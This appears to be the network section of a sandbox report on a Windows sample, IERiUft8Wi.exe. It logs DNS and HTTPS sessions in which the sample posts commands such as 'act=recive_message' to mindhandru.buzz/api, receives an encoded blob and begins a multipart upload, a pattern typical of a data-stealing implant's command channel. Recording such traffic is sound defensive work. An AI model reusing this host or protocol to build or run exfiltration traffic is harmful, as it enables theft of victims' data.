                                                                                                                Dec 27, 2024 08:46:36.446645975 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:36.446661949 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:37.713627100 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:37.713707924 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:37.757225037 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:37.757256031 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:37.758284092 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:37.783607006 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:37.783798933 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:37.783915997 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:37.784012079 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:37.784024000 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:38.750310898 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:38.750422001 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:38.750475883 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:38.750637054 CET49714443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:38.750650883 CET44349714104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:39.083584070 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:39.083633900 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:39.083730936 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:39.084137917 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:39.084160089 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:40.342569113 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:40.342639923 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:40.344233036 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:40.344253063 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:40.344506979 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:40.345873117 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:40.345958948 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:40.345964909 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:42.071600914 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:42.071681976 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:42.071865082 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:42.072406054 CET49720443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:42.072426081 CET44349720104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:42.570002079 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:42.570050001 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:42.570357084 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:42.570760012 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:42.570776939 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.828660011 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.828737020 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.830504894 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.830518007 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.830760002 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.856647968 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.857359886 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.857397079 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.857489109 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.857542038 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.857640028 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.857669115 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.857772112 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.857804060 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.857935905 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.857980967 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.858118057 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.858149052 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.858160973 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.858277082 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.858315945 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.903331995 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.903474092 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.903517008 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.903532982 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.951342106 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.951494932 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.951534033 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.951560974 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:43.999334097 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:43.999475956 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:44.041472912 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:44.041485071 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:44.218018055 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:46.317574024 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:46.317684889 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:46.317739010 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:46.317873955 CET49727443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:46.317898989 CET44349727104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:46.328968048 CET49741443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:46.329021931 CET44349741104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:46.329144955 CET49741443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:46.329556942 CET49741443192.168.2.7104.21.11.101
                                                                                                                Dec 27, 2024 08:46:46.329576969 CET44349741104.21.11.101192.168.2.7
                                                                                                                Dec 27, 2024 08:46:46.916524887 CET49741443192.168.2.7104.21.11.101
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:46:26.987349987 CET | 60467 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 08:46:27.124366999 CET | 53 | 60467 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:46:26.987349987 CET | 192.168.2.7 | 1.1.1.1 | 0xebe2 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:46:27.124366999 CET | 1.1.1.1 | 192.168.2.7 | 0xebe2 | No error (0) | mindhandru.buzz | (none) | 104.21.11.101 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:46:27.124366999 CET | 1.1.1.1 | 192.168.2.7 | 0xebe2 | No error (0) | mindhandru.buzz | (none) | 172.67.165.185 | A (IP address) | IN (0x0001) | false
• mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 104.21.11.101 | 443 | 788 | C:\Users\user\Desktop\IERiUft8Wi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:28 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mindhandru.buzz
2024-12-27 07:46:28 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 07:46:29 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:46:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jgpvmtllfsicoisf8letla29cn; expires=Tue, 22 Apr 2025 01:33:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sBTzu6nAqz%2BCHwsWlUaNoVT38lmut2f1iZZncueyJgPfC4FezO9v4Z1cS0FKM4DIV9lCeOnuA2RL5C7ndMi2ilrYlFYf%2FX0fKEEhzhX04WgpscIjcXRY2B3NhLXgoIyOKo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87b271fd7043e0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1710&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1629464&cwnd=247&unsent_bytes=0&cid=40f0b58c21b59a5f&ts=852&x=0"
2024-12-27 07:46:29 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 07:46:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | 788 | C:\Users\user\Desktop\IERiUft8Wi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:30 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: mindhandru.buzz
2024-12-27 07:46:30 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-27 07:46:31 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:46:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4at75eamcl4rdrqar9tn34k4fi; expires=Tue, 22 Apr 2025 01:33:10 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQG78Isx3WQyi85jJgRxQChrwAjEEvemgZphljqlWFeSZbrhM7VPHyXHPg%2BtIF8frt44vNvkVNWuup%2Bvhw77KpfwHHeIgRMS%2F9bi2dQ%2F%2BMNm3eMVspXJvOmmoQ1sxF2c2Wk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87b27e6a5942af-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1645&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=946&delivery_rate=1760096&cwnd=166&unsent_bytes=0&cid=e9db656f7572de3a&ts=786&x=0"
2024-12-27 07:46:31 UTC | 242 | IN | Data Raw: 34 36 38 0d 0a 53 38 45 64 4b 37 2f 64 6e 4c 6b 47 31 76 39 64 4e 55 62 76 70 69 79 78 57 6f 78 4b 79 47 37 6b 75 68 68 72 43 61 50 65 6e 6e 51 77 34 32 73 4a 68 65 6d 77 6d 33 57 7a 33 57 64 42 4e 4a 72 44 41 4a 4d 37 36 47 6a 79 43 49 58 57 61 77 34 6c 67 61 6a 7a 56 6e 47 6e 66 45 66 4d 75 4c 43 62 59 36 37 64 5a 32 34 39 7a 63 4e 43 6b 32 43 75 4c 36 49 4d 68 64 5a 36 43 6d 4c 4d 72 76 49 58 49 36 31 36 51 39 71 2b 2b 4e 68 71 75 35 6f 34 55 43 65 46 79 45 58 63 4d 75 46 6f 35 45 79 42 77 44 70 52 4b 2b 36 37 36 68 55 47 6f 47 35 41 6e 61 43 77 77 69 53 7a 6b 58 38 50 5a 49 37 44 54 74 30 38 36 43 47 67 42 6f 7a 65 65 77 39 6a 30 37 66 34 48 43 4f 6a 65 55 4c 51 74 2b 7a 56 59 4c 79 52 50 6c 6f 6e 7a 59 6f 4f 31
Data Ascii: 468S8EdK7/dnLkG1v9dNUbvpiyxWoxKyG7kuhhrCaPennQw42sJhemwm3Wz3WdBNJrDAJM76GjyCIXWaw4lgajzVnGnfEfMuLCbY67dZ249zcNCk2CuL6IMhdZ6CmLMrvIXI616Q9q++Nhqu5o4UCeFyEXcMuFo5EyBwDpRK+676hUGoG5AnaCwwiSzkX8PZI7DTt086CGgBozeew9j07f4HCOjeULQt+zVYLyRPlonzYoO1
2024-12-27 07:46:31 UTC | 893 | IN | Data Raw: 43 43 75 63 4f 70 66 74 4e 74 72 47 48 37 4d 72 50 70 57 4e 75 31 6d 43 64 71 7a 76 6f 4d 6b 76 4a 45 78 55 69 65 43 77 30 2f 54 4b 75 45 6f 71 51 53 4f 33 48 41 47 5a 4d 36 79 39 68 45 68 71 6e 68 47 32 72 66 34 31 47 66 30 30 33 39 51 50 4d 32 63 44 76 4d 6f 37 53 75 2b 41 5a 65 59 5a 55 64 79 67 62 76 77 56 6e 48 6a 65 55 66 63 73 76 37 4a 62 4c 2b 57 4f 6b 55 76 68 4d 6c 44 30 7a 58 6b 4a 36 6b 4d 67 64 4a 77 42 6d 48 46 73 66 45 51 4b 61 4d 2f 42 35 32 34 35 70 73 38 39 4c 34 36 52 79 4f 42 30 67 7a 70 65 50 46 6d 73 30 79 42 31 44 70 52 4b 38 6d 35 2f 78 55 69 72 48 78 42 31 71 33 2b 79 57 4b 35 6d 43 31 52 49 59 50 4f 54 63 45 79 34 43 36 70 42 59 33 52 66 77 35 76 67 66 4b 38 45 54 48 6a 4a 77 6e 38 73 76 58 58 62 71 4f 64 66 30 68 71 6c 49 52 4a
Data Ascii: CCucOpftNtrGH7MrPpWNu1mCdqzvoMkvJExUieCw0/TKuEoqQSO3HAGZM6y9hEhqnhG2rf41Gf0039QPM2cDvMo7Su+AZeYZUdygbvwVnHjeUfcsv7JbL+WOkUvhMlD0zXkJ6kMgdJwBmHFsfEQKaM/B5245ps89L46RyOB0gzpePFms0yB1DpRK8m5/xUirHxB1q3+yWK5mC1RIYPOTcEy4C6pBY3Rfw5vgfK8ETHjJwn8svXXbqOdf0hqlIRJ
2024-12-27 07:46:31 UTC | 1369 | IN | Data Raw: 31 38 34 31 0d 0a 75 4d 64 41 33 54 2f 34 61 4c 56 43 6e 35 68 39 42 53 75 5a 2f 50 4d 5a 4a 71 74 2f 53 4e 6d 79 2b 74 70 70 75 4a 51 38 57 79 69 46 79 55 4c 58 4e 2b 59 67 71 51 53 55 31 6e 51 50 62 63 47 35 76 46 68 70 70 47 63 4a 68 66 2f 61 31 58 4f 67 6c 6e 31 69 4a 34 50 4b 53 63 56 34 38 57 61 7a 54 49 48 55 4f 6c 45 72 7a 37 48 33 47 69 36 71 66 6b 72 64 74 66 44 55 62 72 79 56 50 31 6f 6c 68 73 78 49 33 6a 50 68 4a 36 30 45 68 64 52 2f 42 47 69 42 38 72 77 52 4d 65 4d 6e 43 66 69 78 2f 63 70 31 39 71 67 38 57 53 71 4b 30 67 37 4d 64 76 64 6f 72 51 44 47 67 44 6f 44 62 4d 61 34 38 52 77 71 70 33 74 45 30 72 62 33 30 6e 61 2b 6b 54 46 46 4b 59 66 42 51 4e 38 39 34 53 69 72 44 59 6a 53 63 55 6b 6c 67 62 76 6b 56 6e 48 6a 55 45 54 4e 72 66 54 51 64
Data Ascii: 1841uMdA3T/4aLVCn5h9BSuZ/PMZJqt/SNmy+tppuJQ8WyiFyULXN+YgqQSU1nQPbcG5vFhppGcJhf/a1XOgln1iJ4PKScV48WazTIHUOlErz7H3Gi6qfkrdtfDUbryVP1olhsxI3jPhJ60EhdR/BGiB8rwRMeMnCfix/cp19qg8WSqK0g7MdvdorQDGgDoDbMa48Rwqp3tE0rb30na+kTFFKYfBQN894SirDYjScUklgbvkVnHjUETNrfTQd
2024-12-27 07:46:31 UTC | 1369 | IN | Data Raw: 51 50 4d 32 63 44 76 77 37 2b 43 4c 71 45 38 6a 42 4f 67 35 6e 67 65 53 38 48 43 57 6e 66 45 58 55 73 2f 50 61 59 4c 4f 51 4f 31 63 69 69 38 46 50 32 44 44 69 4a 36 41 41 67 74 52 7a 44 32 66 43 76 2f 70 57 5a 2b 4e 34 55 5a 33 6e 76 76 70 70 76 35 45 2f 56 44 57 4b 68 41 43 54 4e 75 67 6f 36 6c 53 51 79 47 30 4f 64 49 2b 6c 76 42 45 6c 34 79 63 4a 31 36 33 37 31 57 43 2b 6d 44 74 62 4c 6f 33 42 58 4e 73 2b 36 53 53 69 43 59 6e 65 66 77 52 73 79 72 2f 75 42 43 71 6e 63 55 57 64 38 62 37 63 66 50 54 46 66 33 49 7a 6a 74 52 49 30 48 6a 78 5a 72 4e 4d 67 64 51 36 55 53 76 42 73 76 41 64 4c 71 68 30 54 64 6d 2f 38 39 42 71 75 70 51 7a 58 79 69 4b 31 6b 50 57 4d 4f 51 68 72 77 43 4c 32 32 67 4b 61 6f 48 79 76 42 45 78 34 79 63 4a 2b 6f 7a 4a 2b 43 53 72 30 79
                                                                                                                Data Ascii: QPM2cDvw7+CLqE8jBOg5ngeS8HCWnfEXUs/PaYLOQO1cii8FP2DDiJ6AAgtRzD2fCv/pWZ+N4UZ3nvvppv5E/VDWKhACTNugo6lSQyG0OdI+lvBEl4ycJ16371WC+mDtbLo3BXNs+6SSiCYnefwRsyr/uBCqncUWd8b7cfPTFf3IzjtRI0HjxZrNMgdQ6USvBsvAdLqh0Tdm/89BqupQzXyiK1kPWMOQhrwCL22gKaoHyvBEx4ycJ+ozJ+CSr0y
                                                                                                                2024-12-27 07:46:31 UTC1369INData Raw: 68 42 61 54 46 4f 30 6e 6f 55 79 5a 6c 6d 4e 4a 62 4d 33 38 70 46 59 75 71 33 64 48 33 72 6e 31 31 32 69 31 6c 44 6c 53 4c 49 72 4c 53 64 6f 2f 37 69 36 34 43 34 76 52 65 67 4a 69 79 37 6a 39 48 57 6e 74 50 30 37 46 2f 36 61 62 56 72 4f 4c 4c 31 52 6b 6b 6f 70 58 6b 7a 2f 69 61 50 4a 4d 69 38 70 37 44 48 6e 46 73 2f 63 45 49 71 56 2f 54 4d 2b 34 38 74 46 72 74 35 55 79 56 43 79 66 78 45 50 54 4b 76 77 75 6f 51 4c 47 6c 6a 6f 4f 63 34 48 6b 76 43 63 2b 71 44 39 57 6b 36 61 2b 33 47 6a 30 78 58 39 55 4c 6f 44 4b 58 4e 63 2b 35 53 75 6b 42 49 50 51 66 67 4e 6d 7a 72 66 32 48 79 47 6a 63 45 7a 56 74 50 6a 56 5a 62 4b 52 4d 68 64 71 7a 63 4e 57 6b 32 43 75 44 37 41 42 67 4d 39 72 50 47 7a 42 37 62 77 4a 5a 37 6f 2f 54 74 48 2f 70 70 74 70 75 4a 63 79 55 69 43
                                                                                                                Data Ascii: hBaTFO0noUyZlmNJbM38pFYuq3dH3rn112i1lDlSLIrLSdo/7i64C4vRegJiy7j9HWntP07F/6abVrOLL1RkkopXkz/iaPJMi8p7DHnFs/cEIqV/TM+48tFrt5UyVCyfxEPTKvwuoQLGljoOc4HkvCc+qD9Wk6a+3Gj0xX9ULoDKXNc+5SukBIPQfgNmzrf2HyGjcEzVtPjVZbKRMhdqzcNWk2CuD7ABgM9rPGzB7bwJZ7o/TtH/pptpuJcyUiC
                                                                                                                2024-12-27 07:46:31 UTC1369INData Raw: 48 62 33 61 4b 30 41 78 6f 41 36 42 32 62 48 76 66 30 65 49 61 4e 35 51 39 6d 38 39 39 68 6a 76 5a 73 30 56 43 36 43 77 30 6a 58 4f 4f 55 76 70 41 71 44 30 33 4e 4a 4a 59 47 37 35 46 5a 78 34 31 6c 71 7a 36 33 4d 31 57 65 76 33 53 41 5a 50 63 33 44 51 70 4e 67 72 69 4f 69 41 35 54 64 63 77 46 76 79 4c 7a 34 48 43 53 6b 66 30 7a 51 75 76 72 56 59 4c 4f 64 4d 31 67 6a 68 63 74 4b 30 7a 65 75 5a 75 6f 4c 6e 70 67 69 53 55 76 4b 71 74 30 59 49 72 45 2f 56 70 4f 6d 76 74 78 6f 39 4d 56 2f 57 53 32 4d 7a 45 44 66 4d 4f 6f 36 71 67 65 50 31 33 73 47 61 38 4b 39 39 68 34 37 70 58 39 43 31 62 6a 32 33 32 71 6d 6e 44 41 58 61 73 33 44 56 70 4e 67 72 68 6d 38 43 34 48 58 4f 43 42 73 32 72 33 32 46 53 4b 76 50 31 61 54 70 72 37 63 61 50 54 46 66 31 6f 6f 67 4d 42 63
                                                                                                                Data Ascii: Hb3aK0AxoA6B2bHvf0eIaN5Q9m899hjvZs0VC6Cw0jXOOUvpAqD03NJJYG75FZx41lqz63M1Wev3SAZPc3DQpNgriOiA5TdcwFvyLz4HCSkf0zQuvrVYLOdM1gjhctK0zeuZuoLnpgiSUvKqt0YIrE/VpOmvtxo9MV/WS2MzEDfMOo6qgeP13sGa8K99h47pX9C1bj232qmnDAXas3DVpNgrhm8C4HXOCBs2r32FSKvP1aTpr7caPTFf1oogMBc
                                                                                                                2024-12-27 07:46:31 UTC741INData Raw: 54 71 56 4d 62 54 64 41 78 71 7a 62 62 37 47 44 75 69 64 55 58 63 75 50 6e 51 64 72 2b 50 4e 46 38 6e 67 38 78 48 30 7a 62 75 4b 61 63 4d 78 70 59 36 44 6e 4f 42 35 4c 77 7a 43 72 52 70 51 35 2b 63 36 63 31 75 73 35 45 70 58 43 57 4f 30 6b 50 44 65 4b 42 6f 75 77 75 58 6d 43 49 66 65 39 61 37 34 31 67 77 34 33 68 46 6e 65 65 2b 30 47 75 36 6b 44 52 54 4c 59 6a 4d 54 64 59 39 35 43 53 6d 44 59 37 52 63 41 78 75 78 37 62 2f 47 43 61 69 63 30 33 55 73 66 65 62 4b 76 53 61 4a 78 64 38 7a 66 4a 65 31 43 44 6a 4f 4f 67 2b 68 63 6c 72 48 47 62 52 75 72 34 35 4b 71 39 38 54 4e 71 76 76 73 51 71 72 64 30 34 57 32 54 56 68 45 37 58 4e 4f 30 76 70 41 4f 4c 31 33 30 43 5a 4d 75 79 37 68 6b 73 71 33 4e 42 30 4b 33 30 30 58 61 39 6c 44 4a 5a 4c 4a 2f 48 44 70 31 34 36
                                                                                                                Data Ascii: TqVMbTdAxqzbb7GDuidUXcuPnQdr+PNF8ng8xH0zbuKacMxpY6DnOB5LwzCrRpQ5+c6c1us5EpXCWO0kPDeKBouwuXmCIfe9a741gw43hFnee+0Gu6kDRTLYjMTdY95CSmDY7RcAxux7b/GCaic03UsfebKvSaJxd8zfJe1CDjOOg+hclrHGbRur45Kq98TNqvvsQqrd04W2TVhE7XNO0vpAOL130CZMuy7hksq3NB0K300Xa9lDJZLJ/HDp146
                                                                                                                2024-12-27 07:46:31 UTC1369INData Raw: 38 30 38 0d 0a 42 45 2b 72 44 38 48 6e 62 6d 2b 67 7a 66 36 33 54 74 47 5a 4e 57 55 48 49 68 74 76 58 2f 36 58 70 6d 57 59 30 6c 39 67 65 53 75 57 47 6d 78 50 78 47 64 2b 50 33 4a 64 72 4b 65 4b 56 52 6a 73 2f 70 70 79 54 58 6f 50 37 73 79 75 4e 39 67 42 47 33 57 72 62 41 44 4b 71 31 78 54 73 76 2f 73 4a 74 72 39 4d 55 47 46 32 7a 4e 2b 77 43 54 49 4b 35 77 36 6a 6d 46 31 6e 51 4f 66 64 44 78 32 77 77 6b 70 57 68 59 6e 66 47 2b 33 53 54 73 7a 58 45 58 49 4a 79 45 46 6f 4e 71 74 58 33 35 57 39 61 4b 5a 55 64 79 67 61 71 38 54 6e 76 74 50 31 75 64 35 37 36 63 5a 36 61 50 4f 56 51 79 6a 6f 4e 77 37 52 62 70 4c 71 38 4c 6c 70 70 55 41 6e 2f 47 2f 4c 4a 57 4a 75 4d 6e 63 4a 33 33 76 75 51 71 39 49 56 2f 44 32 53 34 78 30 44 64 50 2f 67 35 35 79 4b 42 33 6e 38
                                                                                                                Data Ascii: 808BE+rD8Hnbm+gzf63TtGZNWUHIhtvX/6XpmWY0l9geSuWGmxPxGd+P3JdrKeKVRjs/ppyTXoP7syuN9gBG3WrbADKq1xTsv/sJtr9MUGF2zN+wCTIK5w6jmF1nQOfdDx2wwkpWhYnfG+3STszXEXIJyEFoNqtX35W9aKZUdygaq8TnvtP1ud576cZ6aPOVQyjoNw7RbpLq8LlppUAn/G/LJWJuMncJ33vuQq9IV/D2S4x0DdP/g55yKB3n8
                                                                                                                2024-12-27 07:46:31 UTC694INData Raw: 4f 70 57 63 66 45 78 43 63 2f 2f 70 70 73 6a 74 34 38 74 55 53 65 62 78 77 6e 74 42 73 6b 6d 72 51 32 51 79 47 30 47 4a 4f 2b 4b 33 53 67 58 74 6e 78 48 30 37 6a 6f 79 69 54 36 33 54 41 58 66 4c 53 45 42 70 4d 48 6f 47 69 79 54 4e 36 59 54 77 70 6c 7a 37 76 71 42 32 53 45 63 55 37 63 71 65 37 4d 61 2f 75 7a 43 58 5a 6b 77 34 52 49 6b 32 43 38 5a 75 6f 49 6c 35 67 69 57 54 6d 61 36 61 39 42 65 66 46 67 42 38 54 2f 36 4a 73 38 35 74 4e 2f 52 57 54 56 68 41 6e 51 4b 76 77 75 71 52 71 46 6e 30 51 33 54 4d 2b 37 2f 51 41 35 72 6e 4e 6f 33 71 37 30 35 56 71 68 6e 6a 46 5a 49 35 76 56 44 70 31 34 34 57 6a 79 4e 63 61 51 4f 6a 59 6c 67 61 53 38 54 6d 6d 57 66 45 66 54 75 4f 6a 4b 4b 5a 4f 54 4f 46 59 79 6e 63 6c 43 38 6a 76 2f 49 75 70 43 78 74 34 36 55 54 6d 50
                                                                                                                Data Ascii: OpWcfExCc//ppsjt48tUSebxwntBskmrQ2QyG0GJO+K3SgXtnxH07joyiT63TAXfLSEBpMHoGiyTN6YTwplz7vqB2SEcU7cqe7Ma/uzCXZkw4RIk2C8ZuoIl5giWTma6a9BefFgB8T/6Js85tN/RWTVhAnQKvwuqRqFn0Q3TM+7/QA5rnNo3q705VqhnjFZI5vVDp144WjyNcaQOjYlgaS8TmmWfEfTuOjKKZOTOFYynclC8jv/IupCxt46UTmP


Session ID: 2
Source IP: 192.168.2.7
Source Port: 49702
Destination IP: 104.21.11.101
Destination Port: 443
PID: 788
Process: C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:33 UTC | 278 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KL0X99L81JFM9JA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12826
Host: mindhandru.buzz
